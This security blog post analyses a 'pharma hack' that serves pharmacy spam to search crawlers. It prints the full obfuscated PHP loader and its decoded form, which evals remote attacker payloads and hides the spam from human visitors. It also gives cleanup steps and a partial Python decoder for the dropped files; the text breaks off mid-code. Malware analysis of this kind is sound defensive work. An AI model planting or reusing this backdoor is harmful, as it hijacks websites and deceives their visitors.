Pharma hack got caught!

Posted in Malware

Recently we received a number of requests to clean up websites with a strange compromise: the sites contained a number of pages selling Viagra, Levitra and other pharmacy products.

It is important to note that most of the websites were not related to the pharmaceutical business.

This attack is very interesting because it is invisible to the normal visitor: the spam (generally about Viagra, Nexium, Cialis, etc.) only shows up if the user agent is Google's crawler (Googlebot).

The Google search results for site:domainname.com looked like the following:
Cheap viagra, viagra for cheap prices, pharma hack

Analysis:
The source code of the selling page looked as if it had been loaded from either the genericpillspharmacy.com or the securegenericmeds.com domain, so first of all we updated the .htaccess file to replace these URLs with the website's own domain using mod_substitute directives:

Header set Accept-Ranges "none"
AddOutputFilterByType SUBSTITUTE text/html
Substitute 's|<base href="https://genericpillspharmacy.com/" />|<meta http-equiv="refresh" content="0; url=http://domainname.com/" />|in'
Substitute 's|<base href="https://securegenericmeds.com/" />|<meta http-equiv="refresh" content="0; url=http://domainname.com/" />|in'

In this case visitors would have been redirected to the original domain, but this didn't fix the search results, so we continued digging.

Files: We found 2 files named common.php in multiple folders, with the following content inside:

<?php /*cdt mgR<i+F=kugcQzDcxbso0syBSrevXAl07,3 4qkmtaPxG bydN=EONvt9:uw6Eco;Iezy.PUse:yTWk=1zHz;-uqpdus:r1zUcrjx0nsk7okfCfjcn9ygg.wjmrUHAwyj;kApv7GJpJpzl3kMM=E9dqcLXxTX<sh=Ghj2qq 7iOJWbVQgGuwj7<8CU5u2y1lLf3bumEyXT8tv*/  
$zNTfCawezFEPPpWLORvISIq='6RH65572,SM.TOC'^'U -WAPhTY=.Z= -'; $uGZSiOjhcDNedKJcPNsfCPqRglazu='J7-TPP1L3'^'-MD:6<P8V'; $toXTGGiqoKtBpWLyzbMrGPG='PXO7CC:O2U<1T'^'29<Ruwe+W6SU1'; $bYIaQKkHvZuktANiclPeYbp = $zNTfCawezFEPPpWLORvISIq('',$uGZSiOjhcDNedKJcPNsfCPqRglazu($toXTGGiqoKtBpWLyzbMrGPG('O6Bv IGsLM2Z8U i<Iw >;WASc NW:+A2KQs,w4fD9F.P7J4,1Xw=r.Z:cCH8CYQ758eCbaMKQELSvC;wPBZGeSFq+W;,;XWQ8Up8<V:9d;Q.X o-MJ6eB>vB4f9k=CzAL8>XxCoEz1tomLT-zB8I4D5Z l 5WCp,Ol1.=2.5IP862+n;j2K=Q9 ZCie>cG9X:h..= 4PTCT,<6G6Z.c7kL=<h9bZ4;X219=Ea-oYBR.MaCOt1Rs+aY-sX5<;Sx>bqZ,O :jEWvE;-CeS-=Iaf9XD04;DPZV>+7+7rvY:8 -X+M1;q<EVWXA P,RVGRNp.HUf.7+<zz1ghWN7JAnXCyZyOGxLB5C:dpBwK7<>6-w< 9,-,74S6w;+>vR2x50UiqroZ.6=14x.ZY=533NGk,63Ju9C5H2:;w.LD,U:ZRYWDSa6CXXr30-GVM=W;3jlkP+;8Fw.; VT+PGP+;G.;EQ-0FA8uZp=Y9+hnAi0dLh,6PR9,Je>uR6kuU J>0=,ClXR8q y:PHt<HF.5d6=i1S,.<Or1+7n2BV2>4N028,Ls KeDK88r.KN2=8TBsCfB77,8.u=N>Y45M,YyX;FB1x:o97,Nq62:pz,1Qe6X2j-1Y2VuBEGrul:QUK;, 2CGa >:-VvK I+S.XZz4<zE6<5iLPo2h1.Y>G3-ewiIbTZB 6jw=a3s3XTT0A0GcI:=naz4,U<ea44Czq81iG9QE:38.BqFpP,N4H4A3ZcocU>qK 62X74yFxI<.>>hS3;+-8W56<X=85UORYVwn-U,05s,yV<7au<QFglD;xC9<yZ2Gz9 Z3:8,;Q+.S;56Vt31-6uH-k.;IVMx,D:nW16x1E- d01RUy4-nIhZ279zGBe<;5.wjsj-F O9WXLoOI--> O.UCh9=:dV wBYQ3mU7B 8,iKe8RXIXkXEeSOK 4726VZXv82X8U5,9+q;8373198G<nG-X;1VpSLWm,5-L+-Y-973K2.64YRse4=ml<IHA=2BxvYsn0Bs1:46s5B0Rx;GZZ9j0>LD>IC8>p<: >iV:=56N26LvU6Z1.7=R>y7m>9:18LE.<hcM2D;:sKH6-3u U1o5C=21YZ3q1A3Y.ZrwXtz>Y:;3R0=V>B+-DPr+<iAXrP>D:<f<W4-NUJBH12UUGkH6gh nPa<3,nll3QUQW.wkEu45lQR1Sd;Q+6U0+ luCIa<v7u:U1D3P;AM+6Zz --3krG>w9rvq0XwHi=I.Vz-6D86yw;<v4,3w79s5t8BO-M+q;2dzAeYOFR, -q81Cf2r3KLjc6<F=+W+tMU  -1,=t5DRQ,Ac29:AN8o,6FmWIqGc<+TV>UX56j9:iwRS>T4K,7h8eflyWM Fo==0+E>D.YOPD8xM=:- ;,0H=;;>z3Zm+ 30=;QY1ebhwCYB1ePSR7=7P<38:=AGQh6EE,>u4=Q2Bwy147BLs5,25Q3Uj>Q3;4PzMu0>5.WN,cz6s3KL75LO<;0 .IwYC-..GGRl,sXzqM6Z,.9W64Hc57U23:fG4Cr wX9UV=,+F=6s.6XZ,Z>M6>d<=<sO5A8G=k:7B<K7HA7>VNdq5Wrx+GMvvY.yX->>H65652bGCY kh95;g::6  eLr29J1u:=p=:=D,BM0K0dtZTq3:e+DQb99ROlC>8fZBv0>=hp+El-:RkP 
MpL.XibWt6wDaM.e1+SURM1-9UC70Iw2R:yf AVS2p9XM P<>5A+90Me6DR14:r1fA5GBeJl Mt;fhr2Y1FB=9O<;W0dAMhQq=27a65S,0QTw75+0=Vu;uMj3R+0+TAKO CIrTR18qW8>4-3V-I3IDI,P>v+s=a UT6P:q;f<6 ,d1nM3R6SYOxYBOq.YZCMFS::35iY4nzE0IRH=5Zt9-.Tu,,;Az7<Fa=Q<,.:5,39OnTpcTz<UsUmOOHvsktEDDa7f,z+4Wux4j<sZnT>zz2TIV=7iXDRw3YCRt+A,->MQu=6,<6TBHC9U=652Mod:QW4sVk64+6N+v2dXaOW7iKYdw:=I8S=NK.1T9QGZ4W5<6.89IR y22J<.C;,.E290n6qtbK9F:0p<u;rxvz601:UG;,veR363-I0<w7Z9pf:2F33GWVUU763Mc;u.M:0QW>WU1:>2FP:<R8MGgEUP:Vm>7-p>1dZDOZ1;5aY-:6EVGM;1,57K+0MO;15lyB7iS-OK>-L9< 5t,Yf=SqI;C9-+YHPu>3M015pz50Fvo2:,4NT3>;++xTB5 Wp=9eKOqzIE44CKUASW8fFi>A>ZL3F9=R=TgcP4tG+43g:i-GtRFlRBQM4IAQ8=>2T=379 t2HdJA= Im=4zWE3dr9JuNyFtTj9d;ReA> 5QFXE4YSdXT+CV5MF:BG=zgIrJ.6C2G=1-R;y5D1PjtO+ZYHS4aPHG2<GETC5:6Y2I1+eQQ7=CU9 >9 ,=w6Q71yX0HxH2b:<97XLKN4HBqO<B1EC4SH csC ,O:o+khOG:B9V=FZ+S=8Y=R.atsuC,OZ6Ei>G4Q+,Q2+xoF+.A3yEAqyydL3nWFuF0BUq=Wu=v-V.M>hD34:sETVY,98xp:t+47M,;E.f2P+C9-7nb-rWG,8SR23-MF2=.A+,NXX5RJhV7BcLAOdYra0MeaGWGJDIAYQ5K==P4TH,xAU-MVohXA17F-,vIVEI,.xa9qTxBT3LL28S349G 0fULism+5b0=05Zs6D9OOh;; qPPEN4HY4zSSCn3.:R3Vr11BW0.LhQ=h4<7j6uW<Ks1.=DZME1>8XHcJ9FA;0TB+1 <TG4U::1O3e642n8H7OH1E<gIG,63C X<.OPK=490R,ZsbvWL+V.fm==g+0IfZT8JB1N+=9B=DP7MZN9;<+D9TjR;k:thQ,9,.sSXP1+D+w3<M-cxx-srJhFx3RMqD24Jfr,L3MvCf,J;29ikK1P<0i5Cwu8ji26,5Z<>C77;R;->=39yV>A:L4U Pq1RDu=gUT7dSo=on7AkAWDbXPF;24sbZU<Rt5XDX-Uor1=L:5:>8gC7zGhofSXW7Y0y ,,Yy9;<z<8DLY9073Tw ;;j+qj2Ji>BLHK=Vx3U>LRS1b,,-X o+,f1>n3z8W2sc2:M-fNT3rr+=o=;=5U5t4Z>8,P>uGU<<Y-165SWOD7ur;.;Eo7wRXz.=mMX=j;pXEp>crSk9N Z>= G9<><Qiy5<:7+kjQ3E,Vonr=u3-=1Fi0H+OGQVZ56<AU37Pf7YC1MSY8y,-tD2z>C=-zlfP4qnwD>CV5v;eZ2Jh3G6w0G706fhAhsIJL1099635<<6447.4MQ=M,V;h2K25-=w. 
0c>1VW,NlU,QL-><5.o<CZ<jox+:31Yl..YoMA+f; u>>mpU6 9.-f2y3,m,+u>5h2>;EP<4xYgX;sIUipU5QUg<lC ;=267hxLrBFFV<4e;CVe06X18eZ3F ,>QNx ;-m9:WL.puw6>Jj10j0T+=JmCT785V,uO:A<+9 te.J>PwVmYPemT0n.M63<-98828;mZ:8XZ:AJ0uS Rp>.hjErh1jh3D6X1uub>P<A:FpWXY4=g;usHk,vNtQQs+.U5yQ;CSD,->9ZN0O:FZ=<sp-z: :GqSF>M9EL9Z=<:4W3Bg:>+Uw=E<.4lP6II4X;XZ8CB:R5w=o6=v-Cx38K0i,ZA3TEk0rf-4sF;gW;x-6GT.3e+IV6A-2JsPPW9+r  >e9Y;=O3L7U4W3z3WEbc4E ;u0L 6=8>B0SPB U1444S44-6.amU9x...D>JxU61KZ 5<UcCxKvX<=<ZFnys:w+ +bF3+QHGf6mH C;,1QQA738D8S7,512rqN0RsAWzXUQ7XR.NF:D5MUlW>KT9Z2<B,,.Y+E13D5ra3+JdN6D-rZ.,<Ua60sL.SwE5eHHf9XJ5S Ir>9-29 Ssk+47c7CiFnp12a9H20Kt.o-> =s3o8UTj>nJV08t.7+e:wOP9S;6,:1myyW>t5PFH0O16mwv2D1XC<7Y:-s9i2XcSs=; d14eBK,+WOKV;0q7E0,XJW1VBSB2<-B<g>0K 4u=5 2Qv: K3E+<<;.2326Ps<2;, igES4SVKMkkROl8HYela2po'^'=d,Aup58g Tbsdk.Y>=tRb2pjTsw9TX0U >5b=v70cqc;F=eUP,=x9flLZz>ps2cvbOR WP= z=gdY NF>qo-<=0=y2YvY63fh07JXckOUogz:L<f+0o. z8mzPL=vzBs8SNw1q+2;GD.=81h<,M9r=qoy Lb929Cx BwpQbY; Lydr+t:x.e0cOcp9=W =i4h2Kcppveg,:gTx2yny S=uzm1z5qSL.VWAV-7k651yi:Q7vFs=>L41g;odiI2-IZ 5j-eCS6:; WB0 <kz;NIM+5tWM> .0WCbBs77ammcH.gzBY6j=f:s0x1g4f2k Bk zImqqS-OP6<;+Brp,kr,+I q-g8z.HR>z 8zSxsnCDdhxecYY>f6mQh;=U-eaf F;=3IRngg,c.2MLrGa=XexVxBP0q9EruXi <M t0bj -d8P;k7;RInvc,r0ZFA<1irYQ.6ijW gZ=.=ynqap7 JvppV01=T2Nc ,t.q==PCq fSYaPY77e=Lfb:QgLF;6=:q2d3P: -z>,ot1an.tguvi.=iIa<Gw=vTu6swwkcGb<.- qV cy-DJv71JzTryZgrc;z h>lvbm 31l5rk=U9hNg6 PcS HXc=RP0t3hc+P;65=67>-Ub;,PKvu7u5mYMob3 Z>B6J26CwmCwckR09 =T Ab6V fJQ4< 4<uzyfR2oRf2a1- fnF2Qfvk8+5ve2q72rVs20Pw 6p8=htiT 2i51t7mga;F22D18d5,vFU2ar><6=mWfQ=epufgK>Tae9xqz 6g7 4+T>Izc A,8dUX=X>.RU+r9wkn20fpKNG2XUuMxgFc9zMx,8aPaTZ>h3Dwq=t4G+M6<CrAV,xF1Gx90RayY1-+wvq0w:,oTEh<<A;dws<R.6c=xqilok6t:r:zuU2aC3i=;J,dV-qlvPy3y91<o>5t=2=3NyXwg jk0pu=q<ttRh JBZdytMk6n 0J2py;H1<6UcWj+gevDTav>eHtPr+ 3FmU-p1=vyy6; -EEj EXmdB;p6Ed4m+ijSAeu><ufvrW qqgi=9popu=xpy;=z ykxWdn5t7Rixra<tYv:;5pokp>19dcZCyar:E3Mcd:7y2v1P:eo -w1<n4JxV:wG4i:hbo:AaiPv57 QtxE edVA:6er:isc<19cZ5>E= PtXUW >kb,9 c2 3=Ds9iyZaKr=hTfTQp5 :. 
sDs,Lei2w bybxE0IBNYr991OGAD3HrmC0PP+ko7LX+Vx14lI=wzu=yu;VLKpvHtQ9xKQ9+ axr;fuwZqd  B5w z2ZwrmtD0x-  dfUByR=Ou;+bn6Vmcp+s Og55n.50Qfl<:Z:;Qg2NnQ242n2p.fdPp.3UK0<o -wRvB L>x-<7vR;fZuIxqtQ9OpiXCJ+ fduuRW67zS 2=w<.T.79>xls4yewCmpq8XLt6ttAdY3auN5WYas 1cIYe=PgEo3ZVw6=92iRblg=j3Hw2By4Yg =uuaNo<>;1XWL 01 K= -98QluwP9yY .ma9Zbq0-rv s9ja=yNIi4zl vbiqe3D=td7eNnD>q4kpt;la Qrv=-vw59W8f< 0e <:Ojh3ajpIgyaoas: .=d .Zwl4UxfPU3g8Zp9IANu9lWh-U fH=c3F=8+wySs6fMrr>yG.io,,v8qVIY n, lLf3=a:1:xhY;5 w4 W.JQuD9 g4Ddq9+Bf AV7p<.Bu cUAK=4xehyL6Bqe .tojsNp<uU0y 4.8UFb;b11GC0G tXN5sL<wV5. <<lDMJXbfEe971yEsewa3A05 E9EQN0j8;B 9A ezv =WjGlp=a9b =qjhF8F2J4md0T=o2L-sejt<p= F7Pf:=052-6Ko>u=1=Ttuf 3m, =z;  Pr<<tlK- eeW-.Xup4n suisqnpW6;=F0;;rlAc5-w.5 2Dsk3+g<d5nz;-6f3OK- dLJ.q:  mu=ju 9y.sj0lrMbn7d2qYAfrc0qrM=zdBx 8 J:en1> spnS9j9BK>Pw=Z0 kO0tn Qczw:OY9cc >leYMFTLh<gn;fP>TKtmIMtPOt d>6ZxXiiF8x<A 639GSfS -KX.2 FBIc;xKFE,n2WuXrVBt5;4lSAqf5ZDwbtBhePgevVYhi2clcv 1=.gfUy LZgCYTSktw3Usv ;xNd0 p9KegSV:IB>>bDqT,2m19yw:yY>RdjB2z QS0><brOIr8+e=Lf;vzVCJEi   cytY8-gQklf<3ssX2>oXJ;v81bnAQ+;=p53J>,-L hc9p.oi6u 56fy 3DngQu=Xu <.4cig+Z8jfzMvkekqATw,V   5to- rVJb7gKCk>C,.q-6=T YeS+KGDb1k+s0;+=ecz7q7uR;vZU 84=YR1jlWPGcW<wqRa>A,sm4,baSgxlKXu.g7cvE:b+bc=z SZv nhGRNNl RhUc;.V,I8xPLDKU9-z<f=u7>s3Ynpx;cS A7FI6P8A9,y5N.Kyz.+sfkU0maMWDD8lY >Zr1h-PhSvaAX  mfF3G<wrCH= =E;1vD j:cArn;G9IaC LYsaBX8t 11MqbWCh=yDF+ZksA A2EvQKOEUU3-5Vwa0PaY.,hYlvddxn+agr ,ez56s+440VU QQhe>- =4r X=KOaQ9.V 23o 278= uOwAC5;1vzNTM,H=52;;d uBZ<JRppKc.b8 87hzRBpabc5l2r.=GrzlEg> yd-vZ65<w4imk0Gb uPrxhG=.6Z9wqs:B2xs  tdP=bz2GIL4,L=X psv8rzcgP06UfxYx<X,Bxb4p8a=8I6L +,Obx7iirI,cyxEJa<n39-9:6metT8Pm1qWx5<ah3;t-aujqt6;ny07XSwh0C9-:n;x-9ghxyB:95hFS1Y yd>n9-+zFK=1.Ob9 6+yU.3Df JyF-Sb=RjL. 
=f RB,Q76Es=:wbiYcPnqvCZdHyvxpu<ft8Y-Aedb4Z3w1m6 8d-69r <U1Yub WobrRjc:2<7S9:Mmv3DcVCUx-navZS.9a<=+5,5ncm,b=LmOi6SvpBWz7  hHuv,=EPU-Q8+br Di.0;x>Oxbn 7=TPBKBom9Jf4Kd-y6KoJ4 PY.i5 ak6Bns,ZquD;AFF9dhm4tZq4mhiGZFb5  um< OHrr+Z.8k.weXulP9h2 7<H-0f>wym4RYctcysY5;4pWrgC-==Q1zfWA<wDeNvym.V8Jv1g5.lpOt2FP4MY-sr8c5j Of22y.I-uN; 0>W=A8up,nf7nThPr<ary=s=NvQ> n8> suHDiioZVUKzggqcp dZ+z<kQt3ymaTFbvj3nfo>uz.bd=:XVxBfVV9-MR7-xvUw7 Cb=W 5z+Je=pp98 EEpmdPy3Jj DfCwo.QZx 1qx9nU7c9,f 6>g40PP57umghWo0O;G mm3nq Zq.1fTlvO5ud lfLbz+toE:jS>gl97OOU,.kq=feBdy8+ tqV=nM-q-pmsl=Wh oiC3, ;+81w L tkYIhrsVZO+.qH6-orea92B1;ya0,sK.T  C e;V 27merskv ;;=yqQrG 0RJ>aB h9gIzg=dW+g0JuwNcxUdn4cYP9Fx=lEJ=>x0k:ks-aklSbW=K14ikRd>z oer-3d <V0in6j2rTkyGj-Gu5c.=fP.f>XmxPgq1t=MjAA,TV.qNdX1-ax4yyynrLw D:=xqI IqtUqhXYyU m,B RCt>-1:w da<jxByspGrq5dtq<fCqU5uWzDO+53KNGoboi8.>ET31Usfa1:=dG-eLyli686t6fMg;wZez,,-n;:F-qvAgb7xvT6B=VipDv;= Rk+.eMo=7V+ygvmO=X9d ai.aM8bi-ZMViJ0re<Y;8FR>7ztvg+,OMxl+pDX G+B Q.pc-nhayaSb9iRhziIbB hnb7R +3- IDVh9KJ,-v aqkmXb-bm3 L78:Gl7aoNNk dbvblBVjc<0L6V Ci4+u.xo N7ctp:.so4WD:V bh, +Orj1DL.w UN.,  qd P.Fi<a=V=zxtbWH,O iT LVGxpGc3>Jx jrzdWMivaaci6JEjnh33,cabd2x<9d;<w1aRC sMR'))); $bYIaQKkHvZuktANiclPeYbp();//=gdJ4soNGnYc2try<z=QtA.VjjFuMy4
?>

This is the encoded body of the malware; in your particular case the content or the file name can be different.

Here is the decoded body of the malware file (thanks to unphp.net):

<?php if (!defined('FCONTENT_PROC')) {
    define('FCONTENT_PROC', 1);
    @error_reporting(0);
    ini_set('memory_limit', '-1');
    function workerA1Jt() {
        if (array_key_exists('HTTP_TEST', $_SERVER)) {
            echo (md5("TEST2017HT_CLICK"));
            exit();
        }
        if (array_key_exists('DOCUMENT_ROOT', $_SERVER) && is_dir($_SERVER['DOCUMENT_ROOT'])) chdir($_SERVER['DOCUMENT_ROOT']);
        function get_db_dirA1Jt() {
            $default_dirs = array('wp-includes/SimplePie/Content', 'wp-includes/js/tinymce/plugins', 'wp-content/plugins/akismet/_inc/img', 'administrator/components/com_media/views/images', 'libraries/cms/html/language', 'media/editors/tinymce/js/plugins', 'tmp', 'wp-content/uploads');
            foreach ($default_dirs as $d) if (is_dir($d) && is_writable($d)) return ($d);
            $current_dir = opendir('.');
            while ($dir = readdir($current_dir)) if (!preg_match('/^\.+$/', $dir) && is_dir($dir) && is_writable($dir)) return ($dir);
            closedir($current_dir);
            if (is_writable('.')) return ('.');
            $tmp_dir = sys_get_temp_dir();
            if (is_dir($tmp_dir) && is_writable($tmp_dir)) return $tmp_dir;
            return false;
        }
        $short_host = preg_replace('/^www\./', '', $_SERVER['HTTP_HOST']);
        $temp_dir = get_db_dirA1Jt();
        if ($temp_dir === false) return (false);
        $idx_file = "$temp_dir/sess_" . substr(md5($short_host . 'idx'), 0, 26);
        $db_file = "$temp_dir/sess_" . substr(md5($short_host . 'db'), 0, 26);
        function xor_dataA1Jt($data, $key) {
            $out = '';
            for ($i = 0;$i < strlen($data);$i++) $out.= ($data[$i] ^ $key[$i % strlen($key) ]);
            return ($out);
        }
        function fetch_urlA1Jt($url, $data) {
            $content = '';
            if (function_exists('file_get_contents') && ini_get('allow_url_fopen')) {
                if (!is_null($data)) {
                    $opts = array('http' => array('method' => 'POST', 'header' => 'Content-Type: application/x-www-form-urlencoded', 'content' => http_build_query($data)));
                    $context = stream_context_create($opts);
                    $content = file_get_contents($url, false, $context);
                } else $content = file_get_contents($url);
            } elseif (function_exists('curl_init')) {
                $c = curl_init();
                curl_setopt($c, CURLOPT_URL, $url);
                curl_setopt($c, CURLOPT_POST, true);
                if (!is_null($data)) curl_setopt($c, CURLOPT_POSTFIELDS, http_build_query($data));
                curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
                $out = curl_exec($c);
                curl_close($c);
                $content = $out;
            }
            return ($content);
        }
        function update_dbA1Jt($data, $idx_file, $db_file) {
            if (!array_key_exists('method', $data)) return (false);
            if ($data['method'] == 'post') {
                $response = $data['db'];
            } elseif ($data['method'] == 'url') {
                $response = fetch_urlA1Jt($data['url'], array('host' => $_SERVER['HTTP_HOST'], 'file' => __FILE__, 'method' => 'include_remote', 'force' => 1, 'line' => __LINE__));
                print ("Got " . strlen($response) . " bytes response from url=" . $data['url'] . "
");
                $response = @unserialize(base64_decode($response));
            }
            if ($response !== false) {
                $response['idx']['last_db_updated'] = time();
                $response['idx']['update_method'] = $data['method'];
                $bytes_idx = file_put_contents($idx_file, xor_dataA1Jt(serialize($response['idx']), $idx_file));
                $bytes_content = file_put_contents($db_file, $response['db']);
                print "Written to $idx_file $bytes_idx bytes, to $db_file $bytes_content bytes
";
            } else {
                print "Response decode error
";
            }
        }
        if (function_exists('openssl_get_publickey') && function_exists('openssl_public_decrypt')) {
            $pubkey = openssl_get_publickey(base64_decode('LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0NCk1JSUJJakFOQmdrcWhraUc5dzBCQVFFRkFBT0NBUThBTUlJQkNnS0NBUUVBdXMxWjJ2emkvOHRkNkVWOWdMRlMNCkYxWng3alorclF4Z2hhVGUyNUw3bzRyL2ptMlVtR3QrYnJ5MmliMTJCbWFLRmNWVy9UanF4ZEg4VURNSGdwL2wNCmNrOU85VVBPMVBJelRFSjE1dW0zaDdJazdvWGlDNitOOGIzM3g0QTU2dHMwdTJaRHV5ZG0xOWM0U1l2V2hCOU4NCmRqcmtwVmFvU3J6dWFrbzNrTmVOZUVNRSs3Q09YQnJzZFJCNGlCVGVPWjFTK1J3ZEptRDFRaHNVS1NXWVIzblUNCit4bUdma1B2YjliVFBpa0tkaU4yN29CUXRCWnA0MkdOa0I1VzZORngyemIzc2FDVkx2c1NvaXlpeE91NkdmMGENClZlVFdWM05HOW5aTVpCY3M0bDdXbnBjaHpJdFlaYWRSNjBxZi9qS2pnUGhjelhIcC82aFFlQ1V6YzdpQTJKWDYNCjJRSURBUUFCDQotLS0tLUVORCBQVUJMSUMgS0VZLS0tLS0='));
            $data = false;
            $data_key = false;
            foreach ($_COOKIE as $key => $value) {
                $data_key = $key;
                $data = $value;
            }
            if (!$data) {
                foreach ($_REQUEST as $key => $value) {
                    $data_key = $key;
                    $data = $value;
                }
            }
            $data = @unserialize(xor_dataA1Jt(base64_decode($data), $data_key));
            if ($data && array_key_exists('key', $data) && array_key_exists('payload', $data)) {
                if (openssl_public_decrypt($data['key'], $xor_key, $pubkey) === false) return (false);
                if (strpos($xor_key, md5($_SERVER['HTTP_HOST'])) === false) return (false);
                $payload = @unserialize(xor_dataA1Jt($data['payload'], $xor_key));
                if ($payload === false) return (false);
                if (array_key_exists('eval', $payload)) {
                    eval($payload['eval']);
                } elseif (array_key_exists('info', $payload)) {
                    $idx = @unserialize(xor_dataA1Jt(file_get_contents($idx_file), $idx_file));
                    if (!$idx) $idx = false;
                    echo (base64_encode(serialize(array('idx' => $idx, 'server' => $_SERVER, 'file' => __FILE__, 'line' => __LINE__, 'idx_file' => $idx_file, 'db_file' => $db_file, 'db_file_size' => is_file($db_file) ? filesize($db_file) : 0))));
                } elseif (array_key_exists('update', $payload)) {
                    update_dbA1Jt($payload['update'], $idx_file, $db_file);
                }
                exit(0);
            }
        }
        if (is_file($idx_file) && is_file($db_file)) {
            if (!array_key_exists('HTTP_USER_AGENT', $_SERVER)) $_SERVER['HTTP_USER_AGENT'] = '';
            if (!array_key_exists('HTTP_REFERER', $_SERVER)) $_SERVER['HTTP_REFERER'] = '';
            $idx = @unserialize(xor_dataA1Jt(file_get_contents($idx_file), $idx_file));
            if ($idx !== false) {
                if (array_key_exists($_SERVER["REQUEST_URI"], $idx['bot_urls'])) {
                    $is_bot = false;
                    if (preg_match("/Googlebot|bingbot|Slurp/", $_SERVER["HTTP_USER_AGENT"])) $is_bot = true;
                    if (array_key_exists('bot_masks', $idx)) foreach ($idx['bot_masks'] as $mask) if (preg_match("/$mask/i", $_SERVER['REMOTE_ADDR'])) {
                        $is_bot = true;
                        break;
                    }
                    if ($is_bot) {
                        $content_db = @unserialize(gzinflate(file_get_contents($db_file)));
                        if (($content_db !== false) && array_key_exists($_SERVER["REQUEST_URI"], $content_db)) {
                            if (array_key_exists('headers', $content_db[$_SERVER["REQUEST_URI"]])) foreach ($content_db[$_SERVER["REQUEST_URI"]]['headers'] as $h => $code) header($h, true, $code);
                            if (array_key_exists('content', $content_db[$_SERVER["REQUEST_URI"]])) {
                                $sapi_type = php_sapi_name();
                                if (substr($sapi_type, 0, 3) == 'cgi') header("Status: 200 OK");
                                else header("HTTP/1.1 200 OK");
                                echo ($content_db[$_SERVER["REQUEST_URI"]]['content']);
                                exit();
                            }
                        }
                    }
                }
                if ((array_key_exists($_SERVER["REQUEST_URI"], $idx['traf_urls']) || preg_match('/viagra|cialis|levitra|tadalafil|sildenafil|vardenafil/i', $_SERVER["REQUEST_URI"])) && isset($_SERVER["HTTP_REFERER"]) && preg_match('/live|msn|bing|yahoo|google|twitter|\/t\.co\/|aol/', $_SERVER["HTTP_REFERER"])) {
                    if (array_key_exists('headers', $idx['landing'])) foreach ($idx['landing']['headers'] as $h => $code) header($h, true, $code);
                    if (array_key_exists('content', $idx['landing'])) {
                        $sapi_type = php_sapi_name();
                        if (substr($sapi_type, 0, 3) == 'cgi') header("Status: 200 OK");
                        else header("HTTP/1.1 200 OK");
                        echo ($idx['landing']['content']);
                        exit();
                    }
                }
            }
        }
    }
    workerA1Jt();
    $originalurl = "http://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"];
    $originaluseragent = $_SERVER["HTTP_USER_AGENT"];
    $originalpage = fetch_urlA1Jt($originalurl, null);
    header('Cache-Control: no-cache, no-store, must-revalidate');
    header('Pragma: no-cache');
    print $originalpage;
}

The following encoders were used:

  • base64_decode
  • gzinflate

The file checks whether the following folders are writable:

  • wp-includes/SimplePie/Content
  • wp-includes/js/tinymce/plugins
  • wp-content/plugins/akismet/_inc/img
  • administrator/components/com_media/views/images
  • libraries/cms/html/language
  • media/editors/tinymce/js/plugins
  • tmp
  • wp-content/uploads

Next it uses the first writable folder as its temp dir and creates 2 files in it:

  1. $idx_file = "$temp_dir/sess_" . substr(md5($short_host . 'idx'), 0, 26);
  2. $db_file = "$temp_dir/sess_" . substr(md5($short_host . 'db'), 0, 26);

You can find them by running:

find . -type f -name "sess_*"

These are binary files, so you can't read them in a text editor.

Next, the files are filled with the actual content via an HTTP POST. It looks like the website is then included in some crawler rotation, because the files get updated from time to time to display the ads of whichever customers pay.
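To inspect those two files offline, here is an added Python decoder (written for this note, not a tool from the post or its authors) that mirrors what the decoded loader does: the idx file is the PHP-serialised index XOR'd with the idx file's own path string, the relative path the loader computed after chdir to DOCUMENT_ROOT (for example wp-content/uploads/sess_…), and the db file is the raw-deflated (gzdeflate) serialised page table keyed by REQUEST_URI. It includes a minimal PHP unserialize for the types involved, a matching serialize helper that exists only to build a constructed sample, and make_sample(), whose URLs, masks and page bodies are invented rather than real indicators. PHP arrays come back as Python dicts, so lists appear as dicts with integer keys.

```python
import hashlib
import zlib


def xor_data(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the same operation as the sample's xor_dataA1Jt()."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def sess_names(http_host: str, temp_dir: str) -> tuple:
    """Rebuild the idx/db paths the loader derives from HTTP_HOST (www. stripped)."""
    short_host = http_host[4:] if http_host.startswith("www.") else http_host

    def name(tag: str) -> str:
        digest = hashlib.md5((short_host + tag).encode()).hexdigest()
        return f"{temp_dir}/sess_" + digest[:26]

    return name("idx"), name("db")


def php_serialize(v) -> bytes:
    """Minimal PHP serialize() used only to build the constructed sample below."""
    if v is None:
        return b"N;"
    if isinstance(v, bool):
        return b"b:%d;" % v
    if isinstance(v, int):
        return b"i:%d;" % v
    if isinstance(v, float):
        return b"d:%s;" % repr(v).encode()
    if isinstance(v, str):
        raw = v.encode()
        return b's:%d:"%s";' % (len(raw), raw)   # PHP lengths are byte lengths
    if isinstance(v, list):
        v = dict(enumerate(v))
    if isinstance(v, dict):
        body = b"".join(php_serialize(k) + php_serialize(x) for k, x in v.items())
        return b"a:%d:{%s}" % (len(v), body)
    raise TypeError(f"unsupported type {type(v).__name__}")


def php_unserialize(data: bytes):
    """Minimal PHP unserialize() for N, b, i, d, s and a, enough for idx and db."""
    pos = 0

    def parse():
        nonlocal pos
        t = chr(data[pos])
        if t == "N":
            pos += 2
            return None
        if t in "bid":
            end = data.index(b";", pos)
            raw = data[pos + 2:end].decode()
            pos = end + 1
            return {"b": lambda r: r == "1", "i": int, "d": float}[t](raw)
        if t in "sa":
            colon = data.index(b":", pos + 2)
            n = int(data[pos + 2:colon])
            pos = colon + 2                  # skip ':"' (string) or ':{' (array)
            if t == "s":
                value = data[pos:pos + n].decode("utf-8", "replace")
                pos += n + 2                 # skip closing '";'
                return value
            out = {}
            for _ in range(n):
                key = parse()
                out[key] = parse()
            pos += 1                         # skip closing '}'
            return out
        raise ValueError(f"unsupported type {t!r} at offset {pos}")

    value = parse()
    if pos != len(data):
        raise ValueError("trailing data after serialized value")
    return value


def decode_idx(idx_bytes: bytes, idx_path: str):
    """idx = xor(serialize(index), idx_path): the key is the path string itself."""
    return php_unserialize(xor_data(idx_bytes, idx_path.encode()))


def decode_db(db_bytes: bytes):
    """db = gzdeflate(serialize(array REQUEST_URI => {headers, content}))."""
    return php_unserialize(zlib.decompress(db_bytes, -15))   # -15: raw deflate


def make_sample(idx_path: str) -> tuple:
    """Constructed sample pair of sess_ files; all values here are invented."""
    idx = {"bot_urls": {"/cheap-viagra/": 1},
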